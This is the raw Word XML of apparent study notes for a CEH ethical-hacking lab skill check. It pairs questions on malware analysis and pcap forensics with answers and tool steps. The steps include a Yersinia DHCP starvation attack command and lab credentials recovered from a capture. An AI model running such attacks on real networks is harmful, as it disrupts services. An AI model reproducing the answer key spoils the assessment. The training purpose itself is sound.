      <w:r w:rsidRPr="22B7B99F" w:rsidR="5DD3D8B5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lellter</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="49DD78D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_n</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="49DD78D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um</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="49DD78D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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidP="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="7D5172B4" w14:textId="6F3E2397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</w:pPr>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="7984EA1E" w14:textId="626F1881"/>
    <w:p w:rsidR="49DD78D6" w:rsidP="22B7B99F" w:rsidRDefault="49DD78D6" w14:paraId="1C4A67F4" w14:textId="08281B1A">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="49DD78D6">
        <w:rPr/>
        <w:t>8.</w:t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Analyze an </w:t>
      </w:r>
      <w:r w:rsidRPr="511FB87C" w:rsidR="49DD78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ELF executable</w:t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511FB87C" w:rsidR="49DD78D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sample-ELF</w:t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>) file placed at:</w:t>
      </w:r>
      <w:r w:rsidRPr="511FB87C" w:rsidR="4C21946A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11FB87C" w:rsidR="4C21946A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>entrypoint</w:t>
      </w:r>
      <w:r w:rsidRPr="511FB87C" w:rsidR="4C21946A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) or (PEiD)</w:t>
      </w:r>
      <w:r>
        <w:br/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11FB87C" w:rsidR="49DD78D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Admin\Documents</w:t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the </w:t>
      </w:r>
      <w:r w:rsidRPr="511FB87C" w:rsidR="49DD78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EH Workstation – 2</w:t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>machine</w:t>
      </w:r>
      <w:r w:rsidRPr="511FB87C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9DD78D6" w:rsidP="22B7B99F" w:rsidRDefault="49DD78D6" w14:paraId="541F5EE1" w14:textId="5AEC66C2">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="49DD78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Task:</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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Determine the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="49DD78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CPU Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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it was built for.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49DD78D6" w:rsidP="22B7B99F" w:rsidRDefault="49DD78D6" w14:paraId="25308622" w14:textId="7BE2D45F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="49DD78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49DD78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9DD78D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AAAAAANN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B928D62" w:rsidRDefault="3B928D62" w14:paraId="5C8357FE" w14:textId="6DF8361E">
      <w:r w:rsidR="3B928D62">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="3B928D62">
        <w:rPr/>
        <w:t>&gt;  Use</w:t>
      </w:r>
      <w:r w:rsidR="3B928D62">
        <w:rPr/>
        <w:t xml:space="preserve"> DIE DetectItEasy tool-&gt;open elf file-&gt;fileinfo-&gt;Architecture. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B928D62" w:rsidRDefault="3B928D62" w14:paraId="30AFE5B9" w14:textId="4EDFD98D">
      <w:r w:rsidR="3B928D62">
        <w:drawing>
          <wp:inline wp14:editId="59B206AB" wp14:anchorId="0FDD8F35">
            <wp:extent cx="5943600" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1112267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abd72a649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D8714" w:rsidP="22B7B99F" w:rsidRDefault="2F9D8714" w14:paraId="6F800253" w14:textId="090F9103">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="2F9D87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Perform Windows service monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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find out the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="2F9D87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service type associated with display name "afunix"</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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2B7B99F" w:rsidP="511FB87C" w:rsidRDefault="22B7B99F" w14:paraId="33C7A452" w14:textId="17BE6306">
      <w:p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11FB87C" w:rsidR="2F9D87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511FB87C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11FB87C" w:rsidR="2F9D8714">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9D8714" w:rsidRDefault="2F9D8714" w14:paraId="105884FE" w14:textId="11CC1181">
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t>-&gt; E drive-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t>CEHTools</w:t>
      </w:r>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t>-&gt;CEHv13 Module 07 Malware Threats\Malware Analysis Tools\Dynamic-&gt;windows service manager-&gt;run .exe tool-&gt;properties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9D8714" w:rsidRDefault="2F9D8714" w14:paraId="77D50B1B" w14:textId="1A64CC3A">
      <w:r w:rsidR="2F9D8714">
        <w:drawing>
          <wp:inline wp14:editId="1450CD08" wp14:anchorId="3F1B7F8C">
            <wp:extent cx="5943600" cy="2809875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1073582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e96127fd4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D8714" w:rsidRDefault="2F9D8714" w14:paraId="5FAFAC5E" w14:textId="22FB634A">
      <w:r w:rsidR="2F9D8714">
        <w:drawing>
          <wp:inline wp14:editId="4EDA105A" wp14:anchorId="229543BD">
            <wp:extent cx="4657725" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="969539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1b90a5a23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B99F" w:rsidP="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="40B9A7E6" w14:textId="4ADA684F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2F9D8714" w:rsidP="22B7B99F" w:rsidRDefault="2F9D8714" w14:paraId="1B7BC278" w14:textId="3DA59CBE">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="2F9D87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CEHORG has assigned you</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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analyze the snapshot of the operating system registry and perform further steps as part of dynamic analysis.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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Find out whether the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="2F9D87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driver packages registry is changed</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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F9D8714" w:rsidP="22B7B99F" w:rsidRDefault="2F9D8714" w14:paraId="13BF46EF" w14:textId="7D247A44">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="2F9D87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Give your response as Yes/No.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="22B7B99F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2F9D87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2F9D87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2F9D8714">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9D8714" w:rsidRDefault="2F9D8714" w14:paraId="2871A53E" w14:textId="2B81D515">
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t>Yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="5D27E8A2" w14:textId="41173E8C"/>
    <w:p w:rsidR="2F9D8714" w:rsidRDefault="2F9D8714" w14:paraId="3DCE7CCB" w14:textId="3E5BF0E5">
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t>12.</w:t>
      </w:r>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t xml:space="preserve"> CEHORG suspects a possible sniffing attack on a machine in its network.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t xml:space="preserve"> The network traffic data for the session is stored in the Documents folder in EH Workstation – 2 (Windows 11) machine as sniffsession.pcap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9D8714" w:rsidP="22B7B99F" w:rsidRDefault="2F9D8714" w14:paraId="074E3BAF" w14:textId="5C8E1055">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t>Task: Analyze and find out the protocol used for sniffing.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="2F9D8714">
        <w:rPr/>
        <w:t xml:space="preserve"> Format: AAA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51928825" w:rsidP="22B7B99F" w:rsidRDefault="51928825" w14:paraId="084359A4" w14:textId="35DD9D09">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="51928825">
        <w:rPr/>
        <w:t>--&gt;ARP(packet sniffing protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="20EBEFAD" w14:textId="3D1922DB"/>
    <w:p w:rsidR="4F62D67E" w:rsidP="22B7B99F" w:rsidRDefault="4F62D67E" w14:paraId="287C23AC" w14:textId="693F7492">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="4F62D67E">
        <w:rPr/>
        <w:t xml:space="preserve">13. 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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4F62D67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Yersinia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 the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4F62D67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"EH Workstation – 1" (Parrot Security)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 to perform the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4F62D67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DHCP starvation attack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F62D67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Analyze the network traffic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generated during the attack and find the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4F62D67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Transaction ID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the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4F62D67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DHCP Discover packets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F62D67E" w:rsidP="22B7B99F" w:rsidRDefault="4F62D67E" w14:paraId="24AB7F29" w14:textId="1CDF7858">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4F62D67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4F62D6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F62D67E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NaNNnaNNNN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F62D67E" w:rsidRDefault="4F62D67E" w14:paraId="7D1866AF" w14:textId="03E9DB2F">
      <w:r w:rsidR="4F62D67E">
        <w:rPr/>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:hyperlink r:id="R2739228f168d4938">
        <w:r w:rsidRPr="22B7B99F" w:rsidR="4F62D67E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=IUO9gA14Q0c&amp;ab_channel=FireShark</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="68066B62" w:rsidP="22B7B99F" w:rsidRDefault="68066B62" w14:paraId="0A4938BD" w14:textId="465AF58C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="68066B62">
        <w:rPr/>
        <w:t>Time: 39:00</w:t>
      </w:r>
      <w:r w:rsidR="4F62D67E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6AEDC877" w:rsidRDefault="6AEDC877" w14:paraId="64D2EB91" w14:textId="047F2794">
      <w:r w:rsidR="6AEDC877">
        <w:rPr/>
        <w:t xml:space="preserve">-&gt; parrot-&gt; yersinia –I </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="4241D9D6" w14:textId="0083A4AC"/>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="24F37596" w14:textId="78040EAB"/>
    <w:p w:rsidR="46C426B2" w:rsidP="22B7B99F" w:rsidRDefault="46C426B2" w14:paraId="1568EA56" w14:textId="407C0EF5">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="46C426B2">
        <w:rPr/>
        <w:t>15.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an ethical hacker, you are tasked to </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="46C426B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analyze the traffic capture file </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="46C426B2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webtraffic.pcapng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Find out the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="46C426B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packet’s ID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uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="46C426B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ICMP protocol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communicate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46C426B2" w:rsidP="22B7B99F" w:rsidRDefault="46C426B2" w14:paraId="38539D66" w14:textId="59077C46">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="46C426B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Note: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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="46C426B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webtraffic.pcapng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is located at:</w:t>
      </w:r>
      <w:r>
        <w:br/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6C426B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrator\Documents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the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="46C426B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Documents folder on EH Workstation – 2 (Windows 11)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machine.</w:t>
      </w:r>
      <w:r>
        <w:br/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6C426B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46C426B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6C426B2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NaaaNN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="681BBB08" w:rsidRDefault="681BBB08" w14:paraId="55E72264" w14:textId="07E54F20">
      <w:r w:rsidR="681BBB08">
        <w:drawing>
          <wp:inline wp14:editId="214E39CB" wp14:anchorId="4E380F4F">
            <wp:extent cx="5934076" cy="1266825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170120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9fea2bcdd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BBB08" w:rsidP="22B7B99F" w:rsidRDefault="681BBB08" w14:paraId="6D0C0A72" w14:textId="2628F530">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="681BBB08">
        <w:rPr/>
        <w:t xml:space="preserve">16. </w:t>
      </w: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CEHORG has found that one of its web applications — </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="681BBB08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movies.cehorg.com</w:t>
      </w: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— running on its network is leaking credentials in plain text.</w:t>
      </w:r>
      <w:r>
        <w:br/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have been assigned a task of </w:t>
      </w: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analyzing the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="681BBB08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movies.pcap</w:t>
      </w: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file</w:t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finding out the leaked credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="681BBB08" w:rsidP="22B7B99F" w:rsidRDefault="681BBB08" w14:paraId="0D70B156" w14:textId="39B4678F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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Note:</w:t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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="681BBB08">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>movies.pcapng</w:t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is located at:</w:t>
      </w:r>
      <w:r>
        <w:br/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681BBB08">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrator\Documents</w:t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the Documents folder on </w:t>
      </w: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EH Workstation – 2 (Windows 11)</w:t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machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="681BBB08" w:rsidP="22B7B99F" w:rsidRDefault="681BBB08" w14:paraId="5BC6D2DF" w14:textId="64A6A573">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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Make a note of the credentials obtained in this flag — it will be used in </w:t>
      </w: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Part 3 of the CEH Skill Check</w:t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81BBB08" w:rsidP="22B7B99F" w:rsidRDefault="681BBB08" w14:paraId="287C5513" w14:textId="36230879">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="681BB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681BBB0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681BBB08">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aaaaa/aaaaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12B6EBAD" w:rsidRDefault="12B6EBAD" w14:paraId="0D0F6BB3" w14:textId="153F38F5">
      <w:r w:rsidR="12B6EBAD">
        <w:rPr/>
        <w:t>====&gt;http-&gt;post-&gt; Jason/welcome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="74869477" w14:textId="0BE654B6"/>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="6AB1F2F5" w14:textId="331610FE"/>
    <w:p w:rsidR="05677F9F" w:rsidP="22B7B99F" w:rsidRDefault="05677F9F" w14:paraId="100DB7F2" w14:textId="78F9B273">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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17. An attacker has created a </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="05677F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 UDP packet</w:t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sent it to one of the machines in the CEHORG.</w:t>
      </w:r>
      <w:r>
        <w:br/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have been given a task to study the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="05677F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"CustomUDP.pcapng"</w:t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and </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="05677F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find the data size of the UDP packet (in bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05677F9F" w:rsidP="22B7B99F" w:rsidRDefault="05677F9F" w14:paraId="5D7A4E32" w14:textId="0583DED0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="05677F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Note:</w:t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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="05677F9F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomUDP.pcapng</w:t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is located at:</w:t>
      </w:r>
      <w:r>
        <w:br/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05677F9F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrator\Documents</w:t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the Documents folder on </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="05677F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EH Workstation – 2 (Windows 11)</w:t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machine.</w:t>
      </w:r>
      <w:r>
        <w:br/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05677F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05677F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05677F9F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NNN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="63B547DE" w14:textId="2C976211"/>
    <w:p w:rsidR="2F37B5A2" w:rsidRDefault="2F37B5A2" w14:paraId="25F65C52" w14:textId="1F48F1BC">
      <w:r w:rsidR="2F37B5A2">
        <w:drawing>
          <wp:inline wp14:editId="4FA628B0" wp14:anchorId="6573BFBE">
            <wp:extent cx="5943600" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1680330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477bde720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B99F" w:rsidRDefault="22B7B99F" w14:paraId="257A46FF" w14:textId="7591A96D"/>
    <w:p w:rsidR="48197343" w:rsidP="22B7B99F" w:rsidRDefault="48197343" w14:paraId="2960A4D9" w14:textId="5A7FF233">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="48197343">
        <w:rPr/>
        <w:t xml:space="preserve">16. </w:t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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="481973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denial-of-service (DoS) attack</w:t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has been launched on a target machine in the CEHORG network.</w:t>
      </w:r>
      <w:r>
        <w:br/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network session file named </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="481973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"DoS.pcapng"</w:t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has been captured and stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="481973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Documents folder of the EH Workstation – 2</w:t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machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48197343" w:rsidP="22B7B99F" w:rsidRDefault="48197343" w14:paraId="14247C58" w14:textId="20D5E2EB">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="481973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Task:</w:t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Find the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="481973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IP address of the attacker's machine</w:t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81973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481973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48197343">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NNN.NNN.N.NN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="72E3479E" w:rsidRDefault="72E3479E" w14:paraId="2CAEF8EC" w14:textId="35D0AF52">
      <w:r w:rsidR="72E3479E">
        <w:rPr/>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="22EE70BE">
        <w:rPr/>
        <w:t>analyze/statics</w:t>
      </w:r>
      <w:r w:rsidR="72E3479E">
        <w:rPr/>
        <w:t>-&gt;ipv4 stat-&gt;destination post &amp; addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5669829B" w:rsidRDefault="5669829B" w14:paraId="3F2E24FD" w14:textId="0C798E9C">
      <w:r w:rsidR="5669829B">
        <w:drawing>
          <wp:inline wp14:editId="675AE957" wp14:anchorId="7562409B">
            <wp:extent cx="5943600" cy="2409825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62440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0431f6139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B99F" w:rsidRDefault="22B7B99F" w14:paraId="06A3D1C9" w14:textId="3E96B34B"/>
    <w:p w:rsidR="5669829B" w:rsidP="22B7B99F" w:rsidRDefault="5669829B" w14:paraId="4A385D60" w14:textId="15112484">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="5669829B">
        <w:rPr/>
        <w:t xml:space="preserve">****17. </w:t>
      </w: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CEHORG hosts a datacenter for its business clients.</w:t>
      </w:r>
      <w:r>
        <w:br/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While analyzing the network traffic, it was observed that there was a </w:t>
      </w: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huge surge of incoming traffic from multiple sources</w:t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5669829B" w:rsidP="22B7B99F" w:rsidRDefault="5669829B" w14:paraId="3804F891" w14:textId="2CB55360">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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You are given a task to analyze and study the </w:t>
      </w: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DDoS.pcap file</w:t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captured network session (</w:t>
      </w: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DDoS.pcapng</w:t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is stored in the </w:t>
      </w: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Documents folder of the EH Workstation – 2</w:t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machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5669829B" w:rsidP="22B7B99F" w:rsidRDefault="5669829B" w14:paraId="00AF61D6" w14:textId="169082F6">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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Task:</w:t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Determine the </w:t>
      </w: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number of machines</w:t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were used to initiate the attack.</w:t>
      </w:r>
      <w:r>
        <w:br/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566982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Format:</w:t>
